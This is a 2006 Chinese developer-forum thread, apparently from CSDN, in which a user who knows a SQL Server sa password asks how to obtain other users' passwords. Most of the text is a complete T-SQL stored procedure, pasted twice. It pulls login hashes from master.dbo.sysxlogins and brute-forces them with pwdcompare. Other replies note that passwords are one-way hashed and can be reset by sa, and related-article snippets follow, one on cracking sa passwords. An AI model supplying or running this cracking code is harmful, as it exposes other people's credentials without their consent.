2.1w+
社区成员
已经知道了一个数据库的sa密码,如何获得其它用户的用户名和密码?
已经知道了一个数据库的sa密码,如何获得其它用户的用户名和密码?
或者知道其他用户名,如何获得其密码?
或者知道其他用户名,如何获得其密码?
...全文
当前发帖距今超过3年,不再开放新的回复
发表回复
dpbug 2006-03-19
这样阿,那还真不好办了
zjcxc 2006-03-19
前面已经说过了, 密码是单向加密的, 不能破解.
你是合法用户, 管理员, 也无权获取别人的密码, 因为这具密码可能会涉及到别人的隐私, 甚至通过这个密码能猜测到别人的其他东西(例如卡号)的密码
你是合法用户, 管理员, 也无权获取别人的密码, 因为这具密码可能会涉及到别人的隐私, 甚至通过这个密码能猜测到别人的其他东西(例如卡号)的密码
dpbug 2006-03-19
能不能直接获得,我是合法用户,管理员,不想破解
zjcxc 2006-03-19
== 可以暴力破解
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[p_GetPassword]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)
drop procedure [dbo].[p_GetPassword]
GO
/*--穷举法破解 SQL Server 用户密码
可以破解中文,特殊字符,字符+尾随空格的密码
为了方便显示特殊字符的密码,在显示结果中,显示了组成密码的ASCII
理论上可以破解任意位数的密码,一般的电脑都可以破解3位密码
条件是你的电脑配置足够,时间足够
--邹建 2004.08(引用请保留此信息)--*/
/*--调用示例
--测试特殊字符
declare @pwd sysname
set @pwd=char(0)+'a '
exec sp_password null,@pwd,'sa'
exec p_GetPassword
--测试带空格的密码
exec sp_password null,'a ','sa'
exec p_GetPassword
--测试中文
exec sp_password null,'我 ','sa'
exec p_GetPassword
--清除密码
exec sp_password null,null,'sa'
--*/
create proc p_GetPassword
@username sysname=null, --用户名,如果不指定,则列出所有用户
@pwdlen int=3 --密码破解的位数,默认只破解3位及以下的密码
as
--生成要破解的密码的用户表
select name,password
,type=case when xstatus&2048=2048 then 1 else 0 end
,jm=case when password is null or datalength(password)<46
then 1 else 0 end
,pwdstr=case when datalength(password)<46
then cast(password as sysname)
else cast('' as sysname) end
,pwd=cast('' as varchar(8000))
into #pwd
from master.dbo.sysxlogins a
where srvid is null
and name=isnull(@username,name)
--生成临时表
select top 255 id=identity(int,0,1) into #t from sysobjects a,sysobjects b
alter table #t add constraint PK_#t primary key(id)
--清理不需要的字符
if not exists(select 1 from #pwd where type=1)
delete from #t where id between 65 and 90 or id between 129 and 254
--密码破解处理
declare @l int
declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000),@s4 varchar(8000)
--破解1位密码
select @l=0
,@s1='id=a.id'
,@s2='#t a'
,@s3='char(b.id)'
,@s4='cast(b.id as varchar)'
exec('
update pwd set jm=1,pwdstr='+@s3+'
,pwd='+@s4+'
from #pwd pwd,#t b
where pwd.jm=0
and pwdcompare('+@s3+',pwd.password,pwd.type)=1
')
--破解超过2位的密码
while exists(select 1 from #pwd where jm=0 and @l<@pwdlen-1)
begin
select @l=@l+1
,@s1=@s1+',id'+cast(@l as varchar)
+'='+char(@l/26+97)+char(@l%26+97)+'.id'
,@s2=@s2+',#t '+char(@l/26+97)+char(@l%26+97)
,@s3=@s3+'+char(b.id'+cast(@l as varchar)+')'
,@s4=@s4+'+'',''+cast(b.id'+cast(@l as varchar)+' as varchar)'
exec('
select '+@s1+' into #tt from '+@s2+'
update pwd set jm=1,pwdstr='+@s3+'
,pwd='+@s4+'
from #pwd pwd,#tt b
where pwd.jm=0
and pwdcompare('+@s3+',pwd.password,pwd.type)=1
')
end
--显示破解的密码
select 用户名=name,密码=pwdstr,密码ASCII=pwd
from #pwd
go
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[p_GetPassword]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)
drop procedure [dbo].[p_GetPassword]
GO
/*--穷举法破解 SQL Server 用户密码
可以破解中文,特殊字符,字符+尾随空格的密码
为了方便显示特殊字符的密码,在显示结果中,显示了组成密码的ASCII
理论上可以破解任意位数的密码,一般的电脑都可以破解3位密码
条件是你的电脑配置足够,时间足够
--邹建 2004.08(引用请保留此信息)--*/
/*--调用示例
--测试特殊字符
declare @pwd sysname
set @pwd=char(0)+'a '
exec sp_password null,@pwd,'sa'
exec p_GetPassword
--测试带空格的密码
exec sp_password null,'a ','sa'
exec p_GetPassword
--测试中文
exec sp_password null,'我 ','sa'
exec p_GetPassword
--清除密码
exec sp_password null,null,'sa'
--*/
create proc p_GetPassword
@username sysname=null, --用户名,如果不指定,则列出所有用户
@pwdlen int=3 --密码破解的位数,默认只破解3位及以下的密码
as
--生成要破解的密码的用户表
select name,password
,type=case when xstatus&2048=2048 then 1 else 0 end
,jm=case when password is null or datalength(password)<46
then 1 else 0 end
,pwdstr=case when datalength(password)<46
then cast(password as sysname)
else cast('' as sysname) end
,pwd=cast('' as varchar(8000))
into #pwd
from master.dbo.sysxlogins a
where srvid is null
and name=isnull(@username,name)
--生成临时表
select top 255 id=identity(int,0,1) into #t from sysobjects a,sysobjects b
alter table #t add constraint PK_#t primary key(id)
--清理不需要的字符
if not exists(select 1 from #pwd where type=1)
delete from #t where id between 65 and 90 or id between 129 and 254
--密码破解处理
declare @l int
declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000),@s4 varchar(8000)
--破解1位密码
select @l=0
,@s1='id=a.id'
,@s2='#t a'
,@s3='char(b.id)'
,@s4='cast(b.id as varchar)'
exec('
update pwd set jm=1,pwdstr='+@s3+'
,pwd='+@s4+'
from #pwd pwd,#t b
where pwd.jm=0
and pwdcompare('+@s3+',pwd.password,pwd.type)=1
')
--破解超过2位的密码
while exists(select 1 from #pwd where jm=0 and @l<@pwdlen-1)
begin
select @l=@l+1
,@s1=@s1+',id'+cast(@l as varchar)
+'='+char(@l/26+97)+char(@l%26+97)+'.id'
,@s2=@s2+',#t '+char(@l/26+97)+char(@l%26+97)
,@s3=@s3+'+char(b.id'+cast(@l as varchar)+')'
,@s4=@s4+'+'',''+cast(b.id'+cast(@l as varchar)+' as varchar)'
exec('
select '+@s1+' into #tt from '+@s2+'
update pwd set jm=1,pwdstr='+@s3+'
,pwd='+@s4+'
from #pwd pwd,#tt b
where pwd.jm=0
and pwdcompare('+@s3+',pwd.password,pwd.type)=1
')
end
--显示破解的密码
select 用户名=name,密码=pwdstr,密码ASCII=pwd
from #pwd
go
zjcxc 2006-03-19
sql的密码是单向加密, 不可逆的, 因此, 你无法获取其他用户的密码.
不过, 用sa的用户可以修改所有其他用户的密码:
sp_password null,'新密码','用户名'
不过, 用sa的用户可以修改所有其他用户的密码:
sp_password null,'新密码','用户名'
实验1答案 - 建立学生数据库.sql 如选择“混合模式(SQL Server身份验证和Windows身份验证)”表示除了可以用使用登录到Windows的帐号作为登录的依据外,还可以使用SQL Server系统的帐号登录,这里必须为内置SQL Server系统管理员账户(SA)提供一个...
python3 连接SQLserver2014(包括用户名和密码设置) 使用python3 连接SQL server2014今天下午刚好有人请教怎么使用python3 连接SQLserver,虽然自己之前都是用MySQL,但是觉得估计也没有多大的问题,于是就答应下来了,前后花了一个小时左右吧,但是大部分的时间都用在...
【SQL Server】用户的设置与授权、sa用户登录、查询一个数据库中有多少张表 SQL Server用户的设置与授权除了将不同的数据库开放给不同的用户以外,还有一个就是提供一个通道给其它程序访问,毕竟直接使用Windows身份验证有点不太专业。 在实验之前,我们先设置两个数据库,一个test还有一个是...
为SQL数据库创建登录名和密码 为了保证数据库的安全性,需要为数据库创建一个登录帐号,通常每个数据库都有一个默认登录帐号sa,该帐号具有最高的管理权限,但是建议最好重新创建一个新帐号,这样不容易让访客知道,能够使数据库变得更安全。...
SQL SERVER 2000更改Sa用户名和密码 在北大青鸟于海涛的教程中时常出sqlconnection con=new SqlConnection("server=.;database=nowerth;uid=sa;pwd="); 这样的数据库连接。对于此连接有两点儿不安全...对于Sa这个保留用户, 大家一定要足够的小心,...
SQL Server 登录名、服务器角色、用户名和数据库角色 --- 解释 比如说Server这个服务器有4个数据库,DB1,DB2,DB3,DB4,每个数据库都有一个用户USER1,USER2,USER3,USER,在创建一个登录名my的时候可以通过用户映射的操作,为这个登录名在每一个具体的数据库中指定用户,比如...
sqlsever数据库用户管理 在SQL Server中,用户和角色都是分为服务器级别和数据库级别的。 2. 服务器级别 2.1 服务器级用户(即:登录名) 服务器级别下的登录名是指:有权限登录到某个SQL Server服务器的用户。 例如:超级管理员的登录名是...
数据库 实验一 建立环境实验和数据库/表 建立环境实验和数据库/表 实验学时:2学时 实验类型:验证 实验要求:必修 一、实验目的 通过本实验的学习,使学生熟悉SQL Server 2014的集成环境,帮助学生掌握数据库、表的建立方法以及SQL Server的数据导入...
破解MSSQL的SA密码 今天看到网上有这样一篇文章“一个SQL Server Sa密码破解的存储过程”:http://www.wangchao.net.cn/bbsdetail_1804540.html,方法就是暴力破解MSSQL的帐号和密码,包括管理员帐号sa的密码,发现写的很好,不知原贴...
实验二——数据库安全性定义与检查 数据库安全性定义与检查一、 实验题目二、 实验内容和要求三、 实验步骤(一) 自主...定义用户、角色,分配权限给用户、角色,回收权限,以相应的用户名登录数据库验证权限分配是否正确。选择一个应用场景,使用自主
sql server登录名、服务器角色、数据库用户、数据库角色、架构区别联系 来源:...3.一个用户对应一个数据库角色。4.登录名与数据库用户在服务器级别是一对多的;在数据库级别是一对一的。 服务器登录名:指有权限登录到某服务器的用户;服务器角色:指...
用户数据表设计借鉴 浅谈数据库用户表结构设计,第三方登录 基于 Token 的身份验证 最近对用户数据表的设计比较感兴趣,看到了两篇比较好的文章。...说起用户表,大概是每个应用/网站立项动工(码农们)考虑的第一件事情。用户表结构的设计,算是整个后台架构的基石。如果基石不稳,待到后面需求...
eclipse连接数据库时:“用户XX 登录失败” 首先,你要确定自己的语句没有写错,数据库名、...其次,一般来说驱动加载是基本没有问题的,出问题的大部分都在下面这一句: "Conn=DriverManager.getConnection(dbURL,userName,userPwd);" 抛出的异常为: ...
C# 毕业论文提交系统 密码学大作业 文章目录前言一、数据及项目的存储二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习...
如何实现两个数据库之间的同步 SyncNavigator是一款功能强大的数据库同步软件,适用于SQLSERVER, MySQL,具有自动/定时同步数据、无人值守、故障自动恢复、同构/异构数据库同步、断点续传和增量同步等功能,支持Windows xp以上所有操作系统,适用...
六、SQL Server数据库用户管理 登录名为"sa"的用户可以连接到SQL Server服务器,然而,"sa"是超级管理员,可以操作对象管理器中的所有的数据库和数据库对象,会对数据库带来一定的安全隐患。 所以,需要创建不用权限的用户,来管理和操作数据库。 ...
SQLsever用户权限管理和数据库映射 SQL Server2005中"用户映射"里成员身份选项的意思 用户映射 public 维护所有默认权限 db_owner 执行所有数据库角色活动 db_accessadmin 添加和删除数据库用户, 组及角色
sql server登录名、服务器角色、数据库用户、数据库角色、架构区别联系** 1.一个数据库用户可以对应多个架构(架构是表容器)。架构里面包含的是数据库表。 2.一个数据库角色有可能涉及多个架构。数据库角色对应的是权限。 3.一个用户对应一个数据库角色。 4.登录名与数据库用户在服务器...
